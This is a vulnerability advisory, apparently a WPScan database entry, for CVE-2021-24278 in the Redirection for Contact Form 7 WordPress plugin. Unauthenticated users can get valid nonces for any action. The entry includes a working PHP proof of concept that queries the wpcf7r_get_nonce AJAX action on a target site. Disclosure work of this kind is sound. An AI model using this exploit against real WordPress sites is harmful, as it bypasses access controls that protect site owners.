logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

Redirection for Contact Form 7 < 2.3.4 - Unauthenticated Arbitrary Nonce Generation

Description

In the plugin, unauthenticated users can use the wpcf7r_get_nonce AJAX action to retrieve a valid nonce for any WordPress action/function.

Proof of Concept

<?php
// Settings
$wp_url = $argv[1];

// Get nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
   'action' =>  'wpcf7r_get_nonce',
   'param' => '[ANY ACTION HERE]'

]);

$output = curl_exec($ch);
curl_close($ch);
print_r($output);


?>

Affects Plugins

wpcf7-redirect

Fixed in version 2.3.4

References

CVE

CVE-2021-24278

URL

https://www.wordfence.com/blog/2021/04/severe-vulnerabilities-patched-in-redirection-for-contact-form-7-plugin/

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CWE-284

Miscellaneous

Original Researcher

Chloe Chamberland

Submitter

Chloe Chamberland

Submitter website

https://wordfence.com

Submitter twitter

infosecchloe

Verified

Yes

WPVDB ID

99f30604-d62b-4e30-afcd-b482f8d66413

Timeline

Publicly Published

2021-04-20 (about 3 months ago)

Added

2021-04-20 (about 3 months ago)

Last Updated

2021-04-21 (about 3 months ago)

Our Other Services

WPScan WordPress Security Plugin